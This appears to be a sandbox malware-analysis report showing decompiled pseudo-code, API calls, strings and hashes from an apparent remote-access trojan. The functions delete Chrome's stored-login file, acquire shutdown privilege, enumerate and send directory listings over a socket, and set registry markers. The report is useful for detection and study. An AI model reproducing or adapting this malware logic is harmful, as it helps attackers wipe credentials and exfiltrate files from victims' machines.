                      • Instruction Fuzzy Hash: EE21B660604301DBCF04FBF1985EAAE22495F45345F40493DBA46AB1D3EF6C8D4D8261
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 75%
                      			E00749EF4(void* __edi, void* __eflags) {
                      				char _v28;
                      				char _v52;
                      				void* __ebx;
                      				void* __ebp;
                      				long _t18;
                      				void* _t20;
                      				void* _t21;
                      				void* _t28;
                      				void* _t31;
                      				void* _t32;
                      
                      				_t35 = __eflags;
                      				_t31 = __edi;
                      				_t30 = E00742084(_t20,  &_v52, E0077988A(_t20, __eflags, "UserProfile")); // the UserProfile value is prepended to the fixed Chrome path below
                      				E00745343(_t20,  &_v28, _t7, _t31, _t35, "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"); // Chrome's saved-credential database
                      				E00741FC7();
                      				if(DeleteFileA(E00741F95( &_v28)) != 0) { // the file is deleted, not read: this handler wipes stored logins
                      					_t28 = _t32 - 0x18;
                      					_push("\n[Chrome StoredLogins found, cleared!]");
                      					goto L6;
                      				} else {
                      					_t18 = GetLastError();
                      					if(_t18 == 0 || _t18 == 1) { // as decompiled, tests ERROR_SUCCESS / ERROR_INVALID_FUNCTION; ERROR_FILE_NOT_FOUND is 2 and takes the else branch
                      						_t28 = _t32 - 0x18;
                      						_push("\n[Chrome StoredLogins not found]");
                      						L6:
                      						E00742084(_t20, _t28);
                      						E0074A6EF(_t20, _t30, __eflags);
                      						_t21 = 1;
                      					} else {
                      						_t21 = 0;
                      					}
                      				}
                      				E00741FC7();
                      				return _t21;
                      			}

                      Instruction addresses: 0x00749ef4 to 0x00749f82 (one address per decompiled line; per-line alignment lost in extraction)

                      APIs
                      • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 00749F30
                      • GetLastError.KERNEL32 ref: 00749F3A
                      Strings
                      • [Chrome StoredLogins found, cleared!], xrefs: 00749F60
                      • [Chrome StoredLogins not found], xrefs: 00749F54
                      • UserProfile, xrefs: 00749F00
                      • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 00749EFB
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: DeleteErrorFileLast
                      • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      • API String ID: 2018770650-1062637481
                      • Opcode ID: 0dc3d8221cc249bfeea05a4304c0b2cae816236a2f98755ce5921a4d839ea21e
                      • Instruction ID: 7d5a0bfe477c78558c3d0ed535dd99669b4bd05c306bdd97ea8ef8eefc17fa1d
                      • Opcode Fuzzy Hash: 0dc3d8221cc249bfeea05a4304c0b2cae816236a2f98755ce5921a4d839ea21e
                      • Instruction Fuzzy Hash: C001D6716D1109AB8F08B774EC5FCBF7B64A9233007800269F506D61D2FF1D5A5AC6D2
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00753958() {
                      				void* _v8;
                      				intOrPtr _v12;
                      				struct _TOKEN_PRIVILEGES _v24;
                      
                      				OpenProcessToken(GetCurrentProcess(), 0x28,  &_v8);
                      				LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                      				_v24.PrivilegeCount = 1;
                      				_v12 = 2;
                      				AdjustTokenPrivileges(_v8, 0,  &_v24, 0, 0, 0);
                      				return GetLastError() & 0xffffff00 | _t16 != 0x00000000;
                      			}

                      APIs
                      • GetCurrentProcess.KERNEL32(00000028,?), ref: 00753965
                      • OpenProcessToken.ADVAPI32(00000000), ref: 0075396C
                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0075397E
                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0075399D
                      • GetLastError.KERNEL32 ref: 007539A3
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                      • String ID: SeShutdownPrivilege
                      • API String ID: 3534403312-3733053543
                      • Opcode ID: 57de3efaf6b7e4c8d90b5cf3779ae9fbe37c25f097164650246925da2bfbc99c
                      • Instruction ID: a60987210bc6c228598a7d89e50398e392288c658d9cf959de4f333ae17899b5
                      • Opcode Fuzzy Hash: 57de3efaf6b7e4c8d90b5cf3779ae9fbe37c25f097164650246925da2bfbc99c
                      • Instruction Fuzzy Hash: FBF034B5902129ABEB10ABA4ED0DAEFBFBCEF05611F104056B809A1050E6384B05CAB5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 80%
                      			E007477EC(signed int __ecx, void* __edx, void* __eflags) {
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				void* _t106;
                      				intOrPtr* _t111;
                      				signed int _t121;
                      				void* _t133;
                      				void* _t154;
                      				void* _t157;
                      				signed int _t158;
                      				signed int _t159;
                      				signed int _t160;
                      				signed int _t161;
                      				signed int _t172;
                      				signed int _t185;
                      				signed int _t186;
                      				signed int _t188;
                      				void* _t206;
                      				char* _t220;
                      				char* _t221;
                      				void* _t255;
                      				void* _t264;
                      				signed int _t267;
                      				void* _t273;
                      				void* _t279;
                      				void* _t281;
                      				intOrPtr _t282;
                      				void* _t283;
                      				void* _t284;
                      				void* _t287;
                      
                      				_t255 = __edx;
                      				_t188 = __ecx;
                      				E007910A8(E00792622, _t279);
                      				_t282 = _t281 - 0x300;
                      				 *((intOrPtr*)(_t279 - 0x10)) = _t282;
                      				_t185 = _t188;
                      				 *(_t279 - 0x18) = _t185;
                      				E007420D5(_t185, _t279 - 0x9c);
                      				 *(_t279 - 0x1c) =  *(_t279 - 0x1c) | 0xffffffff;
                      				 *_t185 = 0;
                      				 *(_t279 - 4) =  *(_t279 - 4) & 0x00000000;
                      				_t186 = _t185 + 4;
                      				E0074498B(_t186);
                      				_t283 = _t282 - 0x10;
                      				asm("movsd");
                      				asm("movsd");
                      				asm("movsd");
                      				asm("movsd");
                      				_t106 = E00744A08(_t255, _t264);
                      				_t289 = _t106;
                      				if(_t106 == 0) {
                      					_push(0);
                      					_push(0);
                      					goto L4;
                      				} else {
                      					_t283 = _t283 - 0x18;
                      					E00742F93(_t186, _t283, E00742FB7(_t279 - 0x6c, _t279 + 0x38, 0x7ac238), _t289, _t279 + 0x50);
                      					_push(0x64);
                      					_t186 = _t186 & 0xffffff00 | E00744AA4(_t186, _t186, _t179, _t289) == 0xffffffff;
                      					E00741FC7();
                      					_t291 = _t186;
                      					if(_t186 != 0) {
                      						E00744E0B( *(_t279 - 0x18) + 4);
                      						 *((intOrPtr*)(_t279 - 0x20)) = 1;
                      						_push(0x7a85d0);
                      						_t157 = _t279 - 0x20;
                      						L3:
                      						_push(_t157);
                      						L4:
                      						E0077205A();
                      					}
                      				}
                      				_t266 = E0074230A(_t279 + 0x20, _t279 - 0x30);
                      				_t111 = E007422CD(_t279 + 0x20, _t279 - 0x34);
                      				E00748226(_t279 - 0x3c,  *((intOrPtr*)(E0074230A(_t279 + 0x20, _t279 - 0x38))),  *_t111,  *_t109);
                      				_t284 = _t283 + 0xc;
                      				_t256 = _t279 + 8;
                      				_t273 = FindFirstFileW(E00741EEB(E00747514(_t279 - 0x6c, _t279 + 8, _t291, "*")), _t279 - 0x304);
                      				 *(_t279 - 0x1c) = _t273;
                      				E00741EF0();
                      				_t291 = _t273 - 0xffffffff;
                      				if(_t273 != 0xffffffff) {
                      					goto L7;
                      				} else {
                      					_t283 = _t284 - 0x18;
                      					E00742084(_t186, _t283, 0x79f6bc);
                      					_push(0x65);
                      					E00744AA4(_t186,  *(_t279 - 0x18) + 4, _t256, _t291);
                      					E00744E0B( *(_t279 - 0x18) + 4);
                      					 *((intOrPtr*)(_t279 - 0x24)) = 2;
                      					_push(0x7a85d0);
                      					_t157 = _t279 - 0x24;
                      					goto L3;
                      				}
                      				while(1) {
                      					L7:
                      					_t121 = FindNextFileW(_t273, _t279 - 0x304);
                      					__eflags = _t121;
                      					if(_t121 == 0) {
                      						break;
                      					}
                      					_t186 =  *(_t279 - 0x18);
                      					__eflags =  *_t186;
                      					if( *_t186 == 0) {
                      						__eflags =  *(_t279 - 0x304) & 0x00000010;
                      						if(( *(_t279 - 0x304) & 0x00000010) == 0) {
                      							L31:
                      							E0074427F(_t186, _t279 - 0x84, _t279 - 0x2d8);
                      							_t266 = E0074230A(_t279 - 0x84, _t279 - 0x3c);
                      							_t276 = E007422CD(_t279 - 0x84, _t279 - 0x38);
                      							E00748226(_t279 - 0x30,  *((intOrPtr*)(E0074230A(_t279 - 0x84, _t279 - 0x34))),  *_t139,  *_t137);
                      							_t284 = _t284 + 0xc;
                      							__eflags = E00748097(_t279 - 0x84, _t279 + 0x20, 0) - 0xffffffff;
                      							if(__eflags == 0) {
                      								L34:
                      								E00741EF0();
                      								_t273 =  *(_t279 - 0x1c);
                      								continue;
                      							} else {
                      								E00741FD1(_t279 - 0x9c, _t256, _t276, E007420AB(_t186, _t279 - 0x54, _t256, __eflags, _t279 - 0x304, 0x250));
                      								E00741FC7();
                      								_t284 = _t284 - 0x18;
                      								_t256 = E00742F93(_t186, _t279 - 0x54, E0075739C(_t186, _t279 - 0xb4, _t279 + 8), __eflags, 0x7ac238);
                      								E00742F93(_t186, _t284, _t152, __eflags, _t279 - 0x9c);
                      								_push(0x66);
                      								_t154 = E00744AA4(_t186, _t186 + 4, _t152, __eflags);
                      								__eflags = _t154 - 0xffffffff;
                      								_t186 = _t186 & 0xffffff00 | _t154 == 0xffffffff;
                      								E00741FC7();
                      								E00741FC7();
                      								__eflags = _t186;
                      								if(_t186 == 0) {
                      									goto L34;
                      								} else {
                      									 *((intOrPtr*)(_t279 - 0x2c)) = 4;
                      									_push(0x7a85d0);
                      									_t157 = _t279 - 0x2c;
                      									goto L3;
                      								}
                      							}
                      						} else {
                      							_t220 = ".";
                      							_t158 = _t279 - 0x2d8;
                      							while(1) {
                      								_t256 =  *_t158;
                      								__eflags = _t256 -  *_t220;
                      								if(_t256 !=  *_t220) {
                      									break;
                      								}
                      								__eflags = _t256;
                      								if(_t256 == 0) {
                      									L17:
                      									_t159 = 0;
                      								} else {
                      									_t256 =  *((intOrPtr*)(_t158 + 2));
                      									_t43 =  &(_t220[2]); // 0x2e0000
                      									__eflags = _t256 -  *_t43;
                      									if(_t256 !=  *_t43) {
                      										break;
                      									} else {
                      										_t158 = _t158 + 4;
                      										_t220 =  &(_t220[4]);
                      										__eflags = _t256;
                      										if(_t256 != 0) {
                      											continue;
                      										} else {
                      											goto L17;
                      										}
                      									}
                      								}
                      								L19:
                      								__eflags = _t159;
                      								if(_t159 == 0) {
                      									goto L31;
                      								} else {
                      									_t221 = L"..";
                      									_t160 = _t279 - 0x2d8;
                      									while(1) {
                      										_t256 =  *_t160;
                      										__eflags = _t256 -  *_t221;
                      										if(_t256 !=  *_t221) {
                      											break;
                      										}
                      										__eflags = _t256;
                      										if(_t256 == 0) {
                      											L25:
                      											_t161 = 0;
                      										} else {
                      											_t256 =  *((intOrPtr*)(_t160 + 2));
                      											_t46 =  &(_t221[2]); // 0x2e
                      											__eflags = _t256 -  *_t46;
                      											if(_t256 !=  *_t46) {
                      												break;
                      											} else {
                      												_t160 = _t160 + 4;
                      												_t221 =  &(_t221[4]);
                      												__eflags = _t256;
                      												if(_t256 != 0) {
                      													continue;
                      												} else {
                      													goto L25;
                      												}
                      											}
                      										}
                      										L27:
                      										__eflags = _t161;
                      										if(__eflags == 0) {
                      											goto L31;
                      										} else {
                      											_t256 = E00748250(_t186, _t279 - 0xb4, _t279 + 8, __eflags, E0074427F(_t186, _t279 - 0x54, _t279 - 0x2d8));
                      											E007430A6(_t186, _t279 - 0x6c, _t164, _t266, __eflags, "\\");
                      											E00741EF0();
                      											E00741EF0();
                      											_t287 = _t284 - 0x18;
                      											E00747350(_t186, _t287, _t164, __eflags, _t279 + 0x20);
                      											_t284 = _t287 - 0x18;
                      											E00747350(_t186, _t284, _t164, __eflags, _t279 - 0x6c);
                      											_t172 = E00747C55(_t186, _t164, __eflags);
                      											__eflags = _t172;
                      											if(_t172 != 0) {
                      												E00741EF0();
                      												goto L31;
                      											} else {
                      												 *((intOrPtr*)(_t279 - 0x28)) = 3;
                      												_push(0x7a85d0);
                      												_t157 = _t279 - 0x28;
                      												goto L3;
                      											}
                      										}
                      										goto L37;
                      									}
                      									asm("sbb eax, eax");
                      									_t161 = _t160 | 0x00000001;
                      									__eflags = _t161;
                      									goto L27;
                      								}
                      								goto L37;
                      							}
                      							asm("sbb eax, eax");
                      							_t159 = _t158 | 0x00000001;
                      							__eflags = _t159;
                      							goto L19;
                      						}
                      						L37:
                      						E00741FC7();
                      						E00741EF0();
                      						E00741EF0();
                      						E00741FC7();
                      						_t133 = E00741FC7();
                      						 *[fs:0x0] =  *((intOrPtr*)(_t279 - 0xc));
                      						return _t133;
                      					} else {
                      						FindClose(_t273);
                      						_t206 = _t186 + 4;
                      					}
                      					L10:
                      					E00744E0B(_t206);
                      					goto L37;
                      				}
                      				 *(_t279 - 4) =  *(_t279 - 4) | 0xffffffff;
                      				FindClose(_t273);
                      				_t267 =  *(_t279 - 0x18);
                      				E00742F93(_t186, _t284 - 0x18, E00742FB7(_t279 - 0x54, _t279 + 0x38, 0x7ac238), __eflags, _t279 + 0x50);
                      				_push(0x67);
                      				E00744AA4(_t186, _t267 + 4, _t124, __eflags);
                      				E00741FC7();
                      				_t206 = _t267 + 4;
                      				goto L10;
                      			}

                      APIs
                      • __EH_prolog.LIBCMT ref: 007477F1
                        • Part of subcall function 00744A08: connect.WS2_32(?,007ADBA0,00000010), ref: 00744A23
                        • Part of subcall function 00744AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00744B18
                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0074789E
                      • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 007478FC
                      • FindNextFileW.KERNEL32(00000000,?), ref: 00747954
                      • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0074796B
                        • Part of subcall function 00744E0B: closesocket.WS2_32(?), ref: 00744E11
                      • FindClose.KERNEL32(00000000), ref: 00747BA9
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: Find$CloseFile$Exception@8FirstH_prologNextThrowclosesocketconnectsend
                      • String ID:
                      • API String ID: 2104358809-0
                      • Opcode ID: e23ccfbdfff0d27126490ef2ec29bb6b6fd30734b61d3ea5cb34e0f37cfba1a9
                      • Instruction ID: 53800f37e1a74f63382c881a5e1bafcedf2783a9427014b820108cf5a73b2506
                      • Opcode Fuzzy Hash: e23ccfbdfff0d27126490ef2ec29bb6b6fd30734b61d3ea5cb34e0f37cfba1a9
                      • Instruction Fuzzy Hash: 15C19272904119DBCB18FB60DC56AEDB379BF11310F904269F916A7192EF386F49CB90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 46%
                      			E0074D0B5() {
                      				signed int _v32;
                      				void* _t13;
                      				void* _t22;
                      				signed int _t61;
                      				void* _t63;
                      				void* _t64;
                      				void* _t66;
                      
                      				_t63 = (_t61 & 0xfffffff8) - 0x20;
                      				while(1) {
                      					_v32 = _v32 & 0x00000000;
                      					_t52 = E00741F95(0x7ac518);
                      					E00750885(_t10, "override",  &_v32);
                      					_t13 = _v32 - 1;
                      					if(_t13 == 0) {
                      						goto L5;
                      					}
                      					_t22 = _t13 - 1;
                      					if(_t22 == 0) {
                      						_push(1);
                      						_t67 = _t63 - 0x18;
                      						E00747350(0x7ac500, _t63 - 0x18, _t52, __eflags, 0x7ac500);
                      						_push(L"pth_unenc");
                      						E00750B4C(0x80000001, E00741EEB(E007572DA( &_v32, 0x7ac518)));
                      						E00741EF0();
                      						_push(1);
                      						E00742084(0x7ac500, _t67 + 0x20 - 0x18, "3.2.1 Pro");
                      						_push("v");
                      						E00750AA7(0x7ac518, E00741F95(0x7ac518));
                      						E0075015B();
                      						ExitProcess(0);
                      					}
                      					_t74 = _t22 != 1;
                      					if(_t22 != 1) {
                      						L6:
                      						Sleep(0xbb8);
                      						continue;
                      					}
                      					E0074AD84();
                      					L5:
                      					_push(1);
                      					_t64 = _t63 - 0x18;
                      					E00747350(0x7ac500, _t64, _t52, _t74, 0x7ac500);
                      					_push(L"pth_unenc");
                      					E00750B4C(0x80000001, E00741EEB(E007572DA( &_v32, 0x7ac518)));
                      					E00741EF0();
                      					_push(1);
                      					_t66 = _t64 + 0x20 - 0x18;
                      					E00742084(0x7ac500, _t66, "3.2.1 Pro");
                      					_push("v");
                      					E00750AA7(0x7ac518, E00741F95(0x7ac518));
                      					_t63 = _t66 + 0x20;
                      					goto L6;
                      				}
                      			}

                      APIs
                        • Part of subcall function 00750885: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 007508A5
                        • Part of subcall function 00750885: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,00000000), ref: 007508C3
                        • Part of subcall function 00750885: RegCloseKey.ADVAPI32(?), ref: 007508CE
                      • Sleep.KERNEL32(00000BB8), ref: 0074D169
                      • ExitProcess.KERNEL32 ref: 0074D1DE
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: CloseExitOpenProcessQuerySleepValue
                      • String ID: 3.2.1 Pro$override$pth_unenc
                      • API String ID: 2281282204-2083519672
                      • Opcode ID: 0bc98fe6f66da59a8b4199edb5dd2666475742bf4eff2594640c7ed4d79fa955
                      • Instruction ID: 1eb69d6e95cc52afc065d675bbfe55e518a273dceb5834721d06da9469e7edd6
                      • Opcode Fuzzy Hash: 0bc98fe6f66da59a8b4199edb5dd2666475742bf4eff2594640c7ed4d79fa955
                      • Instruction Fuzzy Hash: DB210871F50300EBD618B6744C5FA6E3696ABC2701F804918FC015B2C6EFAD9E5987D2
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 94%
                      			E0078A6BC(void* __ecx, signed int _a4, intOrPtr _a8) {
                      				short _v8;
                      				short _t17;
                      				signed int _t18;
                      				signed int _t23;
                      				signed int _t25;
                      				signed int _t26;
                      				signed int _t27;
                      				void* _t30;
                      				void* _t31;
                      				intOrPtr _t32;
                      				intOrPtr _t33;
                      				intOrPtr* _t36;
                      				intOrPtr* _t37;
                      
                      				_push(__ecx);
                      				_t23 = _a4;
                      				if(_t23 == 0) {
                      					L21:
                      					_t12 = _a8 + 8; // 0xfde8fe81
                      					if(GetLocaleInfoW( *_t12, 0x20001004,  &_v8, 2) != 0) {
                      						_t17 = _v8;
                      						if(_t17 == 0) {
                      							_t17 = GetACP();
                      						}
                      						L25:
                      						return _t17;
                      					}
                      					L22:
                      					_t17 = 0;
                      					goto L25;
                      				}
                      				_t18 = 0;
                      				if( *_t23 == 0) {
                      					goto L21;
                      				}
                      				_t36 = 0x799fa8;
                      				_t25 = _t23;
                      				while(1) {
                      					_t30 =  *_t25;
                      					if(_t30 !=  *_t36) {
                      						break;
                      					}
                      					if(_t30 == 0) {
                      						L7:
                      						_t26 = _t18;
                      						L9:
                      						if(_t26 == 0) {
                      							goto L21;
                      						}
                      						_t37 = 0x799fb0;
                      						_t27 = _t23;
                      						while(1) {
                      							_t31 =  *_t27;
                      							if(_t31 !=  *_t37) {
                      								break;
                      							}
                      							if(_t31 == 0) {
                      								L17:
                      								if(_t18 != 0) {
                      									_t17 = E0077673F(_t23, _t23);
                      									goto L25;
                      								}
                      								_t8 = _a8 + 8; // 0xfde8fe81
                      								if(GetLocaleInfoW( *_t8, 0x2000000b,  &_v8, 2) == 0) {
                      									goto L22;
                      								}
                      								_t17 = _v8;
                      								goto L25;
                      							}
                      							_t32 =  *((intOrPtr*)(_t27 + 2));
                      							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
                      								break;
                      							}
                      							_t27 = _t27 + 4;
                      							_t37 = _t37 + 4;
                      							if(_t32 != 0) {
                      								continue;
                      							}
                      							goto L17;
                      						}
                      						asm("sbb eax, eax");
                      						_t18 = _t18 | 0x00000001;
                      						goto L17;
                      					}
                      					_t33 =  *((intOrPtr*)(_t25 + 2));
                      					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
                      						break;
                      					}
                      					_t25 = _t25 + 4;
                      					_t36 = _t36 + 4;
                      					if(_t33 != 0) {
                      						continue;
                      					}
                      					goto L7;
                      				}
                      				asm("sbb edx, edx");
                      				_t26 = _t25 | 0x00000001;
                      				goto L9;
                      			}

                      0x0078a6c1
                      0x0078a6c2
                      0x0078a6c9
                      0x0078a76d
                      0x0078a77b
                      0x0078a786
                      0x0078a78c
                      0x0078a791
                      0x0078a793
                      0x0078a793
                      0x0078a799
                      0x0078a79e
                      0x0078a79e
                      0x0078a788
                      0x0078a788
                      0x00000000
                      0x0078a788
                      0x0078a6cf
                      0x0078a6d4
                      0x00000000
                      0x00000000
                      0x0078a6da
                      0x0078a6df
                      0x0078a6e1
                      0x0078a6e1
                      0x0078a6e7
                      0x00000000
                      0x00000000
                      0x0078a6ec
                      0x0078a703
                      0x0078a703
                      0x0078a70c
                      0x0078a70e
                      0x00000000
                      0x00000000
                      0x0078a710
                      0x0078a715
                      0x0078a717
                      0x0078a717
                      0x0078a71d
                      0x00000000
                      0x00000000
                      0x0078a722
                      0x0078a740
                      0x0078a742
                      0x0078a765
                      0x00000000
                      0x0078a76a
                      0x0078a752
                      0x0078a75d
                      0x00000000
                      0x00000000
                      0x0078a75f
                      0x00000000
                      0x0078a75f
                      0x0078a724
                      0x0078a72c
                      0x00000000
                      0x00000000
                      0x0078a72e
                      0x0078a731
                      0x0078a737
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0078a739
                      0x0078a73b
                      0x0078a73d
                      0x00000000
                      0x0078a73d
                      0x0078a6ee
                      0x0078a6f6
                      0x00000000
                      0x00000000
                      0x0078a6f8
                      0x0078a6fb
                      0x0078a701
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0078a701
                      0x0078a707
                      0x0078a709
                      0x00000000

                      APIs
                      • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0078A9DB,?,00000000), ref: 0078A755
                      • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0078A9DB,?,00000000), ref: 0078A77E
                      • GetACP.KERNEL32(?,?,0078A9DB,?,00000000), ref: 0078A793
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
• Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: InfoLocale
                      • String ID: ACP$OCP
                      • API String ID: 2299586839-711371036
                      • Opcode ID: 97f031ff038d417340dd1d303cafc9c333aceacf245ed7e8396ee4e703ae008a
                      • Instruction ID: d1b3b019a0305456e5d969c4efe5e0965f6453dcf3b6b3b17f3780f3909ea10c
                      • Opcode Fuzzy Hash: 97f031ff038d417340dd1d303cafc9c333aceacf245ed7e8396ee4e703ae008a
                      • Instruction Fuzzy Hash: B421D626680504B6FB30AF25CD01B9773B6EB50B50B5A8437E90AC7110E73EDD41E392
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00756C39(void** __ecx) {
                      				struct HRSRC__* _t1;
                      				void* _t3;
                      				long _t4;
                      				void** _t5;
                      				struct HRSRC__* _t7;
                      
                      				_t5 = __ecx;
                      				_t1 = FindResourceA( *0x7abd28, "SETTINGS", 0xa);
                      				_t7 = _t1;
                      				if(_t7 != 0) {
                      					_t3 = LockResource(LoadResource( *0x7abd28, _t7));
                      					_t4 = SizeofResource( *0x7abd28, _t7);
                      					 *_t5 = _t3;
                      					return _t4;
                      				}
                      				return _t1;
                      			}

                      0x00756c48
                      0x00756c4a
                      0x00756c50
                      0x00756c54
                      0x00756c65
                      0x00756c74
                      0x00756c7a
                      0x00000000
                      0x00756c7c
                      0x00756c7f

                      APIs
                      • FindResourceA.KERNEL32(SETTINGS,0000000A), ref: 00756C4A
                      • LoadResource.KERNEL32(00000000,?,?,?,0074CC70), ref: 00756C5E
                      • LockResource.KERNEL32(00000000,?,?,?,0074CC70), ref: 00756C65
                      • SizeofResource.KERNEL32(00000000,?,?,?,0074CC70), ref: 00756C74
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
• Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: Resource$FindLoadLockSizeof
                      • String ID: SETTINGS
                      • API String ID: 3473537107-594951305
                      • Opcode ID: 72d36c4526f174d1400ff683f619299523de898a38fcc56e9de93b9c20a088b1
                      • Instruction ID: 6af275bba6d389554c812d1185094fdced2f808a8119bcfce5a24a10b58d4f1b
                      • Opcode Fuzzy Hash: 72d36c4526f174d1400ff683f619299523de898a38fcc56e9de93b9c20a088b1
                      • Instruction Fuzzy Hash: 08E01A7A740658BBC7211BA5AC4CD163E79EFCBB627008026FA0192230D73E8801CB64
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 90%
                      			E00747C55(intOrPtr __ecx, void* __edx, void* __eflags) {
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				intOrPtr* _t81;
                      				intOrPtr* _t83;
                      				signed int _t93;
                      				signed int _t98;
                      				intOrPtr* _t102;
                      				signed int _t126;
                      				signed int _t127;
                      				signed int _t128;
                      				signed int _t129;
                      				void* _t146;
                      				signed int _t147;
                      				intOrPtr _t150;
                      				char* _t171;
                      				char* _t172;
                      				char* _t211;
                      				void* _t215;
                      				void* _t219;
                      				void* _t221;
                      				intOrPtr _t222;
                      				void* _t223;
                      				void* _t225;
                      				void* _t226;
                      
                      				_t226 = __eflags;
                      				_t150 = __ecx;
                      				E007910A8(E0079262C, _t219);
                      				_t222 = _t221 - 0x308;
                      				_push(_t146);
                      				 *((intOrPtr*)(_t219 - 0x10)) = _t222;
                      				 *((intOrPtr*)(_t219 - 0x18)) = _t150;
                      				E007420D5(_t146, _t219 - 0x5c);
                      				_t81 = E0074230A(_t219 + 0x20, _t219 - 0x1c);
                      				_t83 = E007422CD(_t219 + 0x20, _t219 - 0x20);
                      				E00748226(_t219 - 0x28,  *((intOrPtr*)(E0074230A(_t219 + 0x20, _t219 - 0x24))),  *_t83,  *_t81);
                      				_t223 = _t222 + 0xc;
                      				_t204 = _t219 + 8;
                      				_t215 = FindFirstFileW(E00741EEB(E00747514(_t219 - 0xbc, _t219 + 8, _t226, "*")), _t219 - 0x30c);
                      				 *(_t219 - 0x1c) = _t215;
                      				E00741EF0();
                      				if(_t215 != 0xffffffff) {
                      					_t147 = 0;
                      					__eflags = 0;
                      					while(1) {
                      						_t93 = FindNextFileW(_t215, _t219 - 0x30c);
                      						__eflags = _t93;
                      						if(_t93 == 0) {
                      							break;
                      						}
                      						_t211 =  *((intOrPtr*)(_t219 - 0x18));
                      						__eflags =  *_t211;
                      						if( *_t211 == 0) {
                      							__eflags =  *(_t219 - 0x30c) & 0x00000010;
                      							if(( *(_t219 - 0x30c) & 0x00000010) == 0) {
                      								L25:
                      								E0074427F(_t147, _t219 - 0x40, _t219 - 0x2e0);
                      								_t102 = E0074230A(_t219 - 0x40, _t219 - 0x28);
                      								_t217 = E007422CD(_t219 - 0x40, _t219 - 0x24);
                      								E00748226(_t219 - 0x44,  *((intOrPtr*)(E0074230A(_t219 - 0x40, _t219 - 0x20))),  *_t104,  *_t102);
                      								_t223 = _t223 + 0xc;
                      								__eflags = E00748097(_t219 - 0x40, _t219 + 0x20, _t147) - 0xffffffff;
                      								if(__eflags == 0) {
                      									L29:
                      									E00741EF0();
                      									_t215 =  *(_t219 - 0x1c);
                      									continue;
                      								}
                      								E00741FD1(_t219 - 0x5c, _t204, _t217, E007420AB(_t147, _t219 - 0x74, _t204, __eflags, _t219 - 0x30c, 0x250));
                      								E00741FC7();
                      								 *(_t219 - 4) = _t147;
                      								_t223 = _t223 - 0x18;
                      								_t204 = E00742F93(_t147, _t219 - 0x74, E0075739C(_t147, _t219 - 0x8c, _t219 + 8), __eflags, 0x7ac238);
                      								E00742F93(_t147, _t223, _t117, __eflags, _t219 - 0x5c);
                      								_push(0x66);
                      								__eflags = E00744AA4(_t147,  *((intOrPtr*)(_t219 - 0x18)) + 4, _t117, __eflags) - 0xffffffff;
                      								E00741FC7();
                      								E00741FC7();
                      								if((_t147 & 0xffffff00 | E00744AA4(_t147,  *((intOrPtr*)(_t219 - 0x18)) + 4, _t117, __eflags) == 0xffffffff) == 0) {
                      									 *(_t219 - 4) =  *(_t219 - 4) | 0xffffffff;
                      									_t147 = 0;
                      									__eflags = 0;
                      									goto L29;
                      								}
                      								E00741EF0();
                      								E00741FC7();
                      								E00741EF0();
                      								E00741EF0();
                      								_t98 = 0;
                      								L31:
